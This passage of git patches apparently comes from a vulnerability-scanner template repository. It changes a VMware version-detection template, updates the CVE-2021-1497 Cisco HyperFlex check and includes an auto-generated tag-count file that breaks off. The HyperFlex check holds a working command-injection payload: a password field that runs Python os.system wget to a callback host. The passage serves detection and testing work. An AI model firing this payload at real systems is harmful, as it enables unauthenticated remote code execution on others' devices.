b/technologies/vmware-version-detect.yaml index eccf5ef799..2321779424 100644 --- a/technologies/vmware-version-detect.yaml +++ b/technologies/vmware-version-detect.yaml @@ -9,6 +9,7 @@ info: - https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/ - https://svn.nmap.org/nmap/scripts/vmware-version.nse tags: tech,vcenter,vmware + requests: - raw: - | @@ -43,68 +44,15 @@ requests: words: - ha-folder-root + - type: word + words: + - "text/xml" + part: header + extractors: - type: regex - name: name part: body group: 1 regex: - "(.*?)" - - - type: regex - name: version - part: body - group: 1 - regex: - "(.*?)" - - - type: regex - name: build - part: body - group: 1 - regex: - - "(.*?)" - - - type: regex - name: localeVersion - part: body - group: 1 - regex: - - "(.*?)" - - - - type: regex - name: localeBuild - part: body - group: 1 - regex: - - "(.*?)" - - - - type: regex - name: osType - part: body - group: 1 - regex: - - "(.*?)" - - - type: regex - name: productLineId - part: body - group: 1 - regex: - - "(.*?)" - - - type: regex - name: apiType - part: body - group: 1 - regex: - - "(.*?)" - - - type: regex - name: apiVersion - part: body - group: 1 - regex: - - "(.*?)" From a4563e590900274130d4027a2baccab8a3ae5f07 Mon Sep 17 00:00:00 2001 From: sullo Date: Wed, 29 Sep 2021 17:49:02 -0400 Subject: [PATCH 2602/4083] Add check for CVE-2021-1497 --- cves/2021/CVE-2021-1497.yaml | 18 ++++++++++++------ 1 file changed, 12 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index 0074e7885d..229fe664bb 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -3,13 +3,12 @@ id: CVE-2021-1497 info: name: Cisco HyperFlex HX Data Platform RCE description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. - author: gy741 + author: gy741,sullo severity: critical reference: + - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://nvd.nist.gov/vuln/detail/CVE-2021-1497 - - https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497 - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html - - https://twitter.com/cycatz2/status/1394615546935529472 - https://twitter.com/Unit42_Intel/status/1402655493735206915 - https://twitter.com/ptswarm/status/1390300625129201664 - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution @@ -24,12 +23,19 @@ info: requests: - raw: - | - POST /storfs-asup HTTP/1.1 + POST /auth/change HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}` + username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} + - | + POST /auth HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} matchers-condition: and matchers: @@ -38,6 +44,6 @@ requests: - 200 - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" From 2e8bba24a516a4f344d21e2b7936066896c13c75 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 Sep 2021 21:50:01 +0000 Subject: [PATCH 2603/4083] Auto Generated Templates Stats [Wed Sep 29 21:50:01 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1587 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 808 insertions(+), 801 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 991eabbc05..4f0c12d615 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":725},{"name":"lfi","count":260},{"name":"panel","count":248},{"name":"xss","count":244},{"name":"exposure","count":231},{"name":"wordpress","count":223},{"name":"rce","count":198},{"name":"tech","count":181},{"name":"cve2020","count":164},{"name":"wp-plugin","count":149},{"name":"cve2021","count":127},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":85},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":53},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"ssrf","count":37},{"name":"cve2016","count":36},{"name":"","count":36},{"name":"oracle","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"misc","count":23},{"name":"cve2015","count":23},{"name":"disclosure","count":21},{"name":"generic","count":20},{"name":"auth-bypass","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"router","count":19},{"name":"debug","count":18},{"name":"cve2014","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"php","count":16},{"name":"fuzz","count":14},{"name":"weblogic","count":14},{"name":"login","count":14},{"name":"cve2011","count":14},{"name":"struts","count":14},{"name":"cve2012","count":14},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"dlink","count":12},{"name":"aws","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"intrusive","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"nginx","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"rails","count":8},{"name":"vmware","count":8},{"name":"scada","count":8},{"name":"cnvd","count":8},{"name":"files","count":7},{"name":"ibm","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"backup","count":7},{"name":"cve2009","count":7},{"name":"cms","count":7},{"name":"microsoft","count":7},{"name":"kubernetes","count":7},{"name":"confluence","count":7},{"name":"google","count":7},{"name":"django","count":6},{"name":"cve2008","count":6},{"name":"solr","count":6},{"name":"api","count":6},{"name":"jetty","count":6},{"name":"laravel","count":6},{"name":"rconfig","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"deserialization","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"windows","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"hp","count":5},{"name":"tomcat","count":5},{"name":"nodejs","count":5},{"name":"fileupload","count":5},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"symfony","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"artifactory","count":4},{"name":"webserver","count":4},{"name":"strapi","count":4},{"name":"proxy","count":4},{"name":"samsung","count":4},{"name":"exchange","count":4},{"name":"symantec","count":4},{"name":"grafana","count":4},{"name":"camera","count":4},{"name":"magmi","count":4},{"name":"resin","count":4},{"name":"zimbra","count":4},{"name":"firmware","count":4},{"name":"moodle","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"zabbix","count":4},{"name":"wso2","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"git","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"asp","count":4},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"kevinlab","count":3},{"name":"nacos","count":3},{"name":"amazon","count":3},{"name":"ebs","count":3},{"name":"mongodb","count":3},{"name":"tikiwiki","count":3},{"name":"openssh","count":3},{"name":"opensis","count":3},{"name":"npm","count":3},{"name":"slack","count":3},{"name":"terramaster","count":3},{"name":"itop","count":3},{"name":"ofbiz","count":3},{"name":"springcloud","count":3},{"name":"r-seenet","count":3},{"name":"fanruan","count":3},{"name":"bitrix","count":3},{"name":"vbulletin","count":3},{"name":"targa","count":3},{"name":"backups","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"microstrategy","count":3},{"name":"oa","count":3},{"name":"smtp","count":3},{"name":"nosqli","count":3},{"name":"lfr","count":3},{"name":"firebase","count":3},{"name":"injection","count":3},{"name":"druid","count":3},{"name":"ssh","count":3},{"name":"telerik","count":3},{"name":"kibana","count":3},{"name":"mail","count":3},{"name":"kafka","count":3},{"name":"hoteldruid","count":3},{"name":"jellyfin","count":3},{"name":"linkerd","count":3},{"name":"nexus","count":3},{"name":"openam","count":3},{"name":"httpd","count":3},{"name":"caucho","count":3},{"name":"cacti","count":3},{"name":"zhiyuan","count":3},{"name":"jeesns","count":3},{"name":"waf","count":2},{"name":"minio","count":2},{"name":"db","count":2},{"name":"plesk","count":2},{"name":"netsweeper","count":2},{"name":"trixbox","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"hasura","count":2},{"name":"enumeration","count":2},{"name":"ilo","count":2},{"name":"natshell","count":2},{"name":"storage","count":2},{"name":"middleware","count":2},{"name":"akamai","count":2},{"name":"ecology","count":2},{"name":"sonarqube","count":2},{"name":"bypass","count":2},{"name":"geowebserver","count":2},{"name":"hpe","count":2},{"name":"getsimple","count":2},{"name":"ucmdb","count":2},{"name":"grav","count":2},{"name":"webcam","count":2},{"name":"couchdb","count":2},{"name":"smb","count":2},{"name":"activemq","count":2},{"name":"fortios","count":2},{"name":"splunk","count":2},{"name":"avantfax","count":2},{"name":"dos","count":2},{"name":"icewarp","count":2},{"name":"glassfish","count":2},{"name":"bucket","count":2},{"name":"rockmongo","count":2},{"name":"node","count":2},{"name":"huawei","count":2},{"name":"akkadian","count":2},{"name":"qcubed","count":2},{"name":"emerge","count":2},{"name":"maian","count":2},{"name":"nextjs","count":2},{"name":"harbor","count":2},{"name":"adminer","count":2},{"name":"odoo","count":2},{"name":"phpcollab","count":2},{"name":"kong","count":2},{"name":"chiyu","count":2},{"name":"service","count":2},{"name":"vrealize","count":2},{"name":"hashicorp","count":2},{"name":"frp","count":2},{"name":"status","count":2},{"name":"ec2","count":2},{"name":"seeyon","count":2},{"name":"flir","count":2},{"name":"wordfence","count":2},{"name":"idrac","count":2},{"name":"voipmonitor","count":2},{"name":"sonicwall","count":2},{"name":"hostheader-injection","count":2},{"name":"cve2005","count":2},{"name":"favicon","count":2},{"name":"igs","count":2},{"name":"nextcloud","count":2},{"name":"wuzhicms","count":2},{"name":"shellshock","count":2},{"name":"backdoor","count":2},{"name":"github","count":2},{"name":"sharepoint","count":2},{"name":"linux","count":2},{"name":"chamilo","count":2},{"name":"pega","count":2},{"name":"horde","count":2},{"name":"paloalto","count":2},{"name":"jsf","count":2},{"name":"mida","count":2},{"name":"showdoc","count":2},{"name":"dolibarr","count":2},{"name":"cve2007","count":2},{"name":"axis","count":2},{"name":"leak","count":2},{"name":"spark","count":2},{"name":"yii","count":2},{"name":"jeedom","count":2},{"name":"mcafee","count":2},{"name":"aruba","count":2},{"name":"nagios","count":2},{"name":"bruteforce","count":2},{"name":"axis2","count":2},{"name":"netis","count":2},{"name":"hjtcloud","count":2},{"name":"liferay","count":2},{"name":"jboss","count":2},{"name":"globalprotect","count":2},{"name":"cache","count":2},{"name":"saltstack","count":2},{"name":"prestashop","count":2},{"name":"sitecore","count":2},{"name":"openfire","count":2},{"name":"xxljob","count":2},{"name":"azure","count":2},{"name":"totemomail","count":2},{"name":"guacamole","count":2},{"name":"oauth","count":2},{"name":"keycloak","count":2},{"name":"prtg","count":2},{"name":"kentico","count":2},{"name":"netgenie","count":1},{"name":"timeclock","count":1},{"name":"graphql","count":1},{"name":"mediumish","count":1},{"name":"basic-auth","count":1},{"name":"meraki","count":1},{"name":"jmx","count":1},{"name":"phpfusion","count":1},{"name":"ecom","count":1},{"name":"pulsesecure","count":1},{"name":"spectracom","count":1},{"name":"hadoop","count":1},{"name":"pihole","count":1},{"name":"tjws","count":1},{"name":"dvwa","count":1},{"name":"mongo","count":1},{"name":"zarafa","count":1},{"name":"exposures","count":1},{"name":"heroku","count":1},{"name":"gespage","count":1},{"name":"webui","count":1},{"name":"st","count":1},{"name":"monitorr","count":1},{"name":"minimouse","count":1},{"name":"extractor","count":1},{"name":"zyxel","count":1},{"name":"plastic","count":1},{"name":"ns","count":1},{"name":"luftguitar","count":1},{"name":"tenda","count":1},{"name":"lanproxy","count":1},{"name":"dompdf","count":1},{"name":"cofax","count":1},{"name":"owa","count":1},{"name":"exacqvision","count":1},{"name":"tensorboard","count":1},{"name":"fortigate","count":1},{"name":"pyramid","count":1},{"name":"cerebro","count":1},{"name":"lighttpd","count":1},{"name":"mobileiron","count":1},{"name":"gitlist","count":1},{"name":"tongda","count":1},{"name":"jquery","count":1},{"name":"gstorage","count":1},{"name":"diris","count":1},{"name":"shoretel","count":1},{"name":"graphite","count":1},{"name":"aspnuke","count":1},{"name":"wamp","count":1},{"name":"email","count":1},{"name":"shopizer","count":1},{"name":"tcexam","count":1},{"name":"zms","count":1},{"name":"rabbitmq","count":1},{"name":"apos","count":1},{"name":"swagger","count":1},{"name":"postmessage","count":1},{"name":"h3c-imc","count":1},{"name":"gunicorn","count":1},{"name":"tamronos","count":1},{"name":"rubedo","count":1},{"name":"triconsole","count":1},{"name":"qsan","count":1},{"name":"mysql","count":1},{"name":"oneblog","count":1},{"name":"avtech","count":1},{"name":"smartblog","count":1},{"name":"sangfor","count":1},{"name":"parentlink","count":1},{"name":"influxdb","count":1},{"name":"argussurveillance","count":1},{"name":"fortiweb","count":1},{"name":"chyrp","count":1},{"name":"wmt","count":1},{"name":"pcoip","count":1},{"name":"auth","count":1},{"name":"node-red-dashboard","count":1},{"name":"etouch","count":1},{"name":"dom","count":1},{"name":"elasticsearch","count":1},{"name":"tika","count":1},{"name":"xampp","count":1},{"name":"actuator","count":1},{"name":"solman","count":1},{"name":"traefik","count":1},{"name":"sqlite","count":1},{"name":"wiki","count":1},{"name":"asus","count":1},{"name":"tectuus","count":1},{"name":"springframework","count":1},{"name":"panabit","count":1},{"name":"javascript","count":1},{"name":"eg","count":1},{"name":"csod","count":1},{"name":"ntopng","count":1},{"name":"websphere","count":1},{"name":"simplecrm","count":1},{"name":"shoppable","count":1},{"name":"zend","count":1},{"name":"upnp","count":1},{"name":"memcached","count":1},{"name":"camunda","count":1},{"name":"tapestry","count":1},{"name":"mantis","count":1},{"name":"achecker","count":1},{"name":"sprintful","count":1},{"name":"tor","count":1},{"name":"wildfly","count":1},{"name":"cse","count":1},{"name":"ruckus","count":1},{"name":"ognl","count":1},{"name":"haproxy","count":1},{"name":"majordomo2","count":1},{"name":"dnssec","count":1},{"name":"spring","count":1},{"name":"addpac","count":1},{"name":"geutebruck","count":1},{"name":"landray","count":1},{"name":"interlib","count":1},{"name":"ecoa","count":1},{"name":"turbocrm","count":1},{"name":"jeewms","count":1},{"name":"eyelock","count":1},{"name":"rfi","count":1},{"name":"nimble","count":1},{"name":"bash","count":1},{"name":"xiuno","count":1},{"name":"vnc","count":1},{"name":"pippoint","count":1},{"name":"pmb","count":1},{"name":"ganglia","count":1},{"name":"fastcgi","count":1},{"name":"zenario","count":1},{"name":"omi","count":1},{"name":"sentry","count":1},{"name":"yachtcontrol","count":1},{"name":"woocomernce","count":1},{"name":"mpsec","count":1},{"name":"hiawatha","count":1},{"name":"phpinfo","count":1},{"name":"oscommerce","count":1},{"name":"biometrics","count":1},{"name":"qvisdvr","count":1},{"name":"mautic","count":1},{"name":"kerbynet","count":1},{"name":"bolt","count":1},{"name":"ruby","count":1},{"name":"spf","count":1},{"name":"labtech","count":1},{"name":"dotclear","count":1},{"name":"sarg","count":1},{"name":"discord","count":1},{"name":"clickhouse","count":1},{"name":"upload","count":1},{"name":"sceditor","count":1},{"name":"lotuscms","count":1},{"name":"thinkadmin","count":1},{"name":"tileserver","count":1},{"name":"klog","count":1},{"name":"mrtg","count":1},{"name":"cscart","count":1},{"name":"zeroshell","count":1},{"name":"csrf","count":1},{"name":"octobercms","count":1},{"name":"shopware","count":1},{"name":"cockpit","count":1},{"name":"ssltls","count":1},{"name":"stem","count":1},{"name":"netrc","count":1},{"name":"cherokee","count":1},{"name":"esmtp","count":1},{"name":"wooyun","count":1},{"name":"panos","count":1},{"name":"wifisky","count":1},{"name":"myvuehelp","count":1},{"name":"pacsone","count":1},{"name":"phpunit","count":1},{"name":"ricoh","count":1},{"name":"iceflow","count":1},{"name":"k8s","count":1},{"name":"commscope","count":1},{"name":"nweb2fax","count":1},{"name":"centos","count":1},{"name":"fastapi","count":1},{"name":"shiro","count":1},{"name":"opensns","count":1},{"name":"metinfo","count":1},{"name":"seacms","count":1},{"name":"elfinder","count":1},{"name":"resourcespace","count":1},{"name":"monitorix","count":1},{"name":"plone","count":1},{"name":"scs","count":1},{"name":"postgres","count":1},{"name":"opentsdb","count":1},{"name":"xml","count":1},{"name":"timesheet","count":1},{"name":"domxss","count":1},{"name":"floc","count":1},{"name":"linkedin","count":1},{"name":"javafaces","count":1},{"name":"emc","count":1},{"name":"glances","count":1},{"name":"miscrsoft","count":1},{"name":"artica","count":1},{"name":"dotnetnuke","count":1},{"name":"nomad","count":1},{"name":"rmc","count":1},{"name":"fiori","count":1},{"name":"jitsi","count":1},{"name":"totaljs","count":1},{"name":"mongoshake","count":1},{"name":"gitea","count":1},{"name":"saltapi","count":1},{"name":"wing-ftp","count":1},{"name":"redhat","count":1},{"name":"setup","count":1},{"name":"sco","count":1},{"name":"servicedesk","count":1},{"name":"glowroot","count":1},{"name":"expn","count":1},{"name":"visualtools","count":1},{"name":"jenzabar","count":1},{"name":"checkpoint","count":1},{"name":"fuelcms","count":1},{"name":"sidekiq","count":1},{"name":"wavemaker","count":1},{"name":"gridx","count":1},{"name":"pgadmin","count":1},{"name":"emby","count":1},{"name":"adb","count":1},{"name":"fortigates","count":1},{"name":"solarlog","count":1},{"name":"empirecms","count":1},{"name":"listserv","count":1},{"name":"zmanda","count":1},{"name":"iptime","count":1},{"name":"gogs","count":1},{"name":"zzzcms","count":1},{"name":"pagespeed","count":1},{"name":"kindeditor","count":1},{"name":"ilo4","count":1},{"name":"mirai","count":1},{"name":"kubeflow","count":1},{"name":"nuxeo","count":1},{"name":"clockwork","count":1},{"name":"grails","count":1},{"name":"crm","count":1},{"name":"octoprint","count":1},{"name":"clockwatch","count":1},{"name":"blind","count":1},{"name":"sureline","count":1},{"name":"opensmtpd","count":1},{"name":"discourse","count":1},{"name":"api-manager","count":1},{"name":"processmaker","count":1},{"name":"mdb","count":1},{"name":"svnserve","count":1},{"name":"spidercontrol","count":1},{"name":"panasonic","count":1},{"name":"krweb","count":1},{"name":"optiLink","count":1},{"name":"74cms","count":1},{"name":"fortinet","count":1},{"name":"oidc","count":1},{"name":"whm","count":1},{"name":"lancom","count":1},{"name":"jsp","count":1},{"name":"k8","count":1},{"name":"database","count":1},{"name":"concrete","count":1},{"name":"ems","count":1},{"name":"spip","count":1},{"name":"sophos","count":1},{"name":"accela","count":1},{"name":"realteo","count":1},{"name":"elascticsearch","count":1},{"name":"azkaban","count":1},{"name":"robomongo","count":1},{"name":"selea","count":1},{"name":"lg-nas","count":1},{"name":"cve2006","count":1},{"name":"codeigniter","count":1},{"name":"magicflow","count":1},{"name":"ewebs","count":1},{"name":"bullwark","count":1},{"name":"kyan","count":1},{"name":"tracer","count":1},{"name":"portainer","count":1},{"name":"visionhub","count":1},{"name":"uwsgi","count":1},{"name":"phpfastcache","count":1},{"name":"redcap","count":1},{"name":"weiphp","count":1},{"name":"tensorflow","count":1},{"name":"s3","count":1},{"name":"mailchimp","count":1},{"name":"flink","count":1},{"name":"natemail","count":1},{"name":"cyberoam","count":1},{"name":"websvn","count":1},{"name":"ssl","count":1},{"name":"gloo","count":1},{"name":"alerta","count":1},{"name":"rocketchat","count":1},{"name":"varnish","count":1},{"name":"frontpage","count":1},{"name":"metabase","count":1},{"name":"arl","count":1},{"name":"bitly","count":1},{"name":"ioncube","count":1},{"name":"netmask","count":1},{"name":"scimono","count":1},{"name":"primetek","count":1},{"name":"rsyncd","count":1},{"name":"maccmsv10","count":1},{"name":"eprints","count":1},{"name":"opencast","count":1},{"name":"cobub","count":1},{"name":"razor","count":1},{"name":"vcenter","count":1},{"name":"htmli","count":1},{"name":"zte","count":1},{"name":"plugin","count":1},{"name":"couchbase","count":1},{"name":"synnefo","count":1},{"name":"viewpoint","count":1},{"name":"trane","count":1},{"name":"jenkin","count":1},{"name":"woocommerce","count":1},{"name":"eyou","count":1},{"name":"duomicms","count":1},{"name":"nsasg","count":1},{"name":"blackboard","count":1},{"name":"redmine","count":1},{"name":"apiman","count":1},{"name":"openvpn","count":1},{"name":"chevereto","count":1},{"name":"circontrorl","count":1},{"name":"shopxo","count":1},{"name":"sar2html","count":1},{"name":"tpshop","count":1},{"name":"proftpd","count":1},{"name":"beanshell","count":1},{"name":"chinaunicom","count":1},{"name":"plc","count":1},{"name":"alibaba","count":1},{"name":"cors","count":1},{"name":"kafdrop","count":1},{"name":"tidb","count":1},{"name":"dotnet","count":1},{"name":"jaspersoft","count":1},{"name":"gsoap","count":1},{"name":"hiboss","count":1},{"name":"calendarix","count":1},{"name":"webmin","count":1},{"name":"phpwiki","count":1},{"name":"zookeeper","count":1},{"name":"webftp","count":1},{"name":"finereport","count":1},{"name":"keenetic","count":1},{"name":"cgi","count":1},{"name":"qdpm","count":1},{"name":"viewlinc","count":1},{"name":"acexy","count":1},{"name":"acontent","count":1},{"name":"lotus","count":1},{"name":"clave","count":1},{"name":"mara","count":1},{"name":"socomec","count":1},{"name":"idemia","count":1},{"name":"perl","count":1},{"name":"centreon","count":1},{"name":"okta","count":1},{"name":"b2evolution","count":1},{"name":"xdcms","count":1},{"name":"wavlink","count":1},{"name":"expose","count":1},{"name":"skywalking","count":1},{"name":"openerp","count":1},{"name":"fedora","count":1},{"name":"drone","count":1},{"name":"sgp","count":1},{"name":"werkzeug","count":1},{"name":"xvr","count":1},{"name":"erp-nc","count":1},{"name":"twitter-server","count":1},{"name":"episerver","count":1},{"name":"zcms","count":1},{"name":"soar","count":1},{"name":"mantisbt","count":1},{"name":"owasp","count":1},{"name":"craftcms","count":1},{"name":"clusterengine","count":1},{"name":"cocoon","count":1},{"name":"ghost","count":1},{"name":"huijietong","count":1},{"name":"avalanche","count":1},{"name":"netdata","count":1},{"name":"salesforce","count":1},{"name":"webmodule-ee","count":1},{"name":"olivetti","count":1},{"name":"smi","count":1},{"name":"ueditor","count":1},{"name":"svn","count":1},{"name":"rujjie","count":1},{"name":"gilacms","count":1},{"name":"terraform","count":1},{"name":"landrayoa","count":1},{"name":"openemr","count":1},{"name":"dvr","count":1},{"name":"vsphere","count":1},{"name":"redwood","count":1},{"name":"nps","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"bedita","count":1},{"name":"nc2","count":1},{"name":"mariadb","count":1},{"name":"expressjs","count":1},{"name":"blue-ocean","count":1},{"name":"daybyday","count":1},{"name":"burp","count":1},{"name":"rhymix","count":1},{"name":"graylog","count":1},{"name":"froxlor","count":1},{"name":"powercreator","count":1},{"name":"dbeaver","count":1},{"name":"openrestry","count":1},{"name":"office365","count":1},{"name":"openstack","count":1},{"name":"sourcebans","count":1},{"name":"yealink","count":1},{"name":"nordex","count":1},{"name":"comodo","count":1},{"name":"szhe","count":1},{"name":"darkstat","count":1},{"name":"bazarr","count":1},{"name":"default","count":1},{"name":"openx","count":1},{"name":"appweb","count":1},{"name":"myucms","count":1},{"name":"doh","count":1},{"name":"moinmoin","count":1},{"name":"moin","count":1},{"name":"nexusdb","count":1},{"name":"announcekit","count":1},{"name":"vidyo","count":1},{"name":"exponentcms","count":1},{"name":"vsftpd","count":1},{"name":"beanstalk","count":1},{"name":"webadmin","count":1},{"name":"lansweeper","count":1},{"name":"zm","count":1},{"name":"redis","count":1},{"name":"phalcon","count":1},{"name":"cloudinary","count":1},{"name":"smartsense","count":1},{"name":"ambari","count":1},{"name":"commax","count":1},{"name":"trilithic","count":1},{"name":"fortilogger","count":1},{"name":"xunchi","count":1},{"name":"anchorcms","count":1},{"name":"wazuh","count":1},{"name":"gateone","count":1},{"name":"rockethchat","count":1},{"name":"bigbluebutton","count":1},{"name":"geddy","count":1},{"name":"lutron","count":1},{"name":"linksys","count":1},{"name":"codemeter","count":1},{"name":"servicenow","count":1},{"name":"payara","count":1},{"name":"faraday","count":1},{"name":"rmi","count":1},{"name":"rdp","count":1},{"name":"bookstack","count":1},{"name":"vscode","count":1},{"name":"nuuo","count":1},{"name":"gotmls","count":1},{"name":"nette","count":1},{"name":"ulterius","count":1},{"name":"jfrog","count":1},{"name":"opm","count":1},{"name":"clink-office","count":1},{"name":"xmlchart","count":1},{"name":"sage","count":1},{"name":" default-login","count":1},{"name":"wondercms","count":1},{"name":"nedi","count":1},{"name":"subrion","count":1},{"name":"embedthis","count":1},{"name":"goahead","count":1},{"name":"feifeicms","count":1},{"name":"alertmanager","count":1},{"name":"cloudflare","count":1},{"name":"aura","count":1},{"name":"sql","count":1},{"name":"maxsite","count":1},{"name":"tieline","count":1},{"name":"circontrol","count":1},{"name":"logontracer","count":1},{"name":"karel","count":1},{"name":"hortonworks","count":1},{"name":"javamelody","count":1},{"name":"nifi","count":1},{"name":"acme","count":1},{"name":"jnoj","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":258},{"name":"daffainfo","count":213},{"name":"pdteam","count":195},{"name":"geeknik","count":152},{"name":"dwisiswant0","count":131},{"name":"gy741","count":72},{"name":"pussycat0x","count":67},{"name":"madrobot","count":61},{"name":"princechaddha","count":61},{"name":"gaurang","count":42},{"name":"0x_akoko","count":39},{"name":"ice3man","count":26},{"name":"philippedelteil","count":25},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"logicalhunter","count":6},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"thomas_from_offensity","count":3},{"name":"vsh00t","count":3},{"name":"idealphase","count":3},{"name":"unstabl3","count":3},{"name":"impramodsargar","count":3},{"name":"fyoorer","count":3},{"name":"mavericknerd","count":3},{"name":"sushantkamble","count":3},{"name":"shifacyclewala","count":3},{"name":"shine","count":3},{"name":"z3bd","count":3},{"name":"tess","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"johnk3r","count":3},{"name":"binaryfigments","count":3},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"mohammedsaneem","count":2},{"name":"hetroublemakr","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"0xelkomy","count":2},{"name":"bsysop","count":2},{"name":"ree4pwn","count":2},{"name":"swissky","count":2},{"name":"0xsapra","count":2},{"name":"alifathi-h1","count":2},{"name":"huowuzhao","count":2},{"name":"afaq","count":2},{"name":"random-robbie","count":2},{"name":"parth","count":2},{"name":"gal nagli","count":2},{"name":"bernardofsr","count":2},{"name":"vavkamil","count":2},{"name":"0xcrypto","count":2},{"name":"0xprial","count":2},{"name":"convisoappsec","count":2},{"name":"johnjhacking","count":2},{"name":"bing0o","count":2},{"name":"0xrudra","count":2},{"name":"zomsop82","count":2},{"name":"udit_thakkur","count":2},{"name":"socketz","count":2},{"name":"ehsahil","count":2},{"name":"g4l1t0","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"lotusdll","count":2},{"name":"amsda","count":2},{"name":"x1m_martijn","count":2},{"name":"pxmme1337","count":2},{"name":"foulenzer","count":2},{"name":"hahwul","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"whoever","count":2},{"name":"manas_harsh","count":2},{"name":"fabaff","count":2},{"name":"nkxxkn","count":2},{"name":"randomrobbie","count":2},{"name":"moritz 